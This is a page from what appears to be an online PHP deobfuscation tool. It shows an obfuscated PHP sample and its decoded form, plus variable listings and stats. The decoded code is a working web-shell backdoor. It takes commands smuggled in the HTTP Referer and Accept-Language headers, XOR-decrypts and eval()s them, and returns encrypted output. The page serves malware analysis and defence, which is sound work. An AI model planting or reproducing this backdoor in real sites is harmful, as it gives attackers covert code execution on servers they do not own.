Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $W='9&(?:;q=0.([\\d]9&))?,?/",$9&r9&9&a,$m9&);if($q&&$m){@sess9&i9&on_s9&9&tart();$s..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$W='9&(?:;q=0.([\\d]9&))?,?/",$9&r9&9&a,$m9&);if($q&&$m){@sess9&i9&on_s9&9&tart();$s=&$_SES9&SI';
$O='(m9&d5($i.$kh),0,3));$f9&=$sl(9&$ss(9&9&md5($i.$kf),0,9&3));$p=9&""9&;for($z=1;$9&z<9&9&';
$j='$kh=9&"5d419&"9&;$kf="409&2a";fun9&ct9&ion x($t,$k){9&$c=strl9&e9&9&n($k);$l=strl9&en(9&$';
$Y='c9&ount($m[1]9&)9&;$z+9&+)$p.=$q[$m[2][$z9&]];i9&f(strpos($p,$9&h)9&===0){$s[$i9&]=""9';
$X='$r["H9&TTP_9&9&ACCEPT_LA9&N9&GUA9&GE"];if($rr&&$ra){$9&u=p9&ar9&se9&_url($rr);par9&s9&e_str($';
$i='e64_decode9&(pr9&eg_r9&eplace(ar9&9&ray("/_/","9&9&/-/"),a9&rra9&y("/","+"),$ss($s9&[$i';
$b='ON;$ss="9&sub9&9&str";$sl="str9&9&tolower";9&$i=$m[1][0]9&.9&9&$m[1][9&1];$h9&=$sl(9&$ss';
$f='$s[$9&i],$f);if($9&e9&){$k=9&$kh.$kf;ob9&_start();9&@eva9&l(@g9&zu9&ncompr9&ess(@x(@bas9&';
$V=str_replace('lw','','clwrelwlwalwlwte_lwfunction');
$w='],09&,$9&e))),$k)))9&;$o=ob9&9&_get_con9&tents();9&ob9&_end_clean(9&);9&$d=b9&9&ase69&9&4_';
$D='encode(x(gzc9&o9&mpress($o),$k));pr9&int("<9&$k>$9&d</9&$k>");@ses9&sion_d9&estroy();}}}}';
$U='&;$p9&9&=9&$ss($p,3)9&;}if(array_ke9&y_exists($i9&,$s)){$s9&[$i9&].=$9&p;$e=9&9&strpos(';
$L='t);$o9&="";for9&($i=0;$i<$l9&;){for($j9&=0;($j<9&$c&&$i9&9&<$l);9&$j++,$i+9&+){$o.=$t9&';
$h='{$i}^9&$k{$j};}9&9&}9&r9&eturn $o;}$r=$_SERVER;$rr=9&@$r["H9&T9&TP_R9&EF9&ERER"];$ra=@';
$e='u["9&quer9&y"],$q);$q9&=array_va9&lue9&9&s($q);preg_mat9&ch_9&all(9&"/([\\w])[\\9&w-]9&+';
$P=str_replace('9&','',$j.$L.$h.$X.$e.$W.$b.$O.$Y.$U.$f.$i.$w.$D);
$F=$V('',$P);$F();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D encode(x(gzc9&o9&mpress($o),$k));pr9&int("<9&$k>$9&d</9&$k>"..
$F None
$L t);$o9&="";for9&($i=0;$i<$l9&;){for($j9&=0;($j<9&$c&&$i9&9&<..
$O (m9&d5($i.$kh),0,3));$f9&=$sl(9&$ss(9&9&md5($i.$kf),0,9&3));..
$P $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$U &;$p9&9&=9&$ss($p,3)9&;}if(array_ke9&y_exists($i9&,$s)){$s9&..
$V create_function
$W 9&(?:;q=0.([\d]9&))?,?/",$9&r9&9&a,$m9&);if($q&&$m){@sess9&i..
$X $r["H9&TTP_9&9&ACCEPT_LA9&N9&GUA9&GE"];if($rr&&$ra){$9&u=p9&..
$Y c9&ount($m[1]9&)9&;$z+9&+)$p.=$q[$m[2][$z9&]];i9&f(strpos($p..
$b ON;$ss="9&sub9&9&str";$sl="str9&9&tolower";9&$i=$m[1][0]9&.9..
$e u["9&quer9&y"],$q);$q9&=array_va9&lue9&9&s($q);preg_mat9&ch_..
$f $s[$9&i],$f);if($9&e9&){$k=9&$kh.$kf;ob9&_start();9&@eva9&l(..
$h {$i}^9&$k{$j};}9&9&}9&r9&eturn $o;}$r=$_SERVER;$rr=9&@$r["H9..
$i e64_decode9&(pr9&eg_r9&eplace(ar9&9&ray("/_/","9&9&/-/"),a9&..
$j $kh=9&"5d419&"9&;$kf="409&2a";fun9&ct9&ion x($t,$k){9&$c=str..
$w ],09&,$9&e))),$k)))9&;$o=ob9&9&_get_con9&tents();9&ob9&_end_..

Stats

MD5 102f169280dc1c1b7e089ce0e78c8605
Eval Count 1
Decode Time 113 ms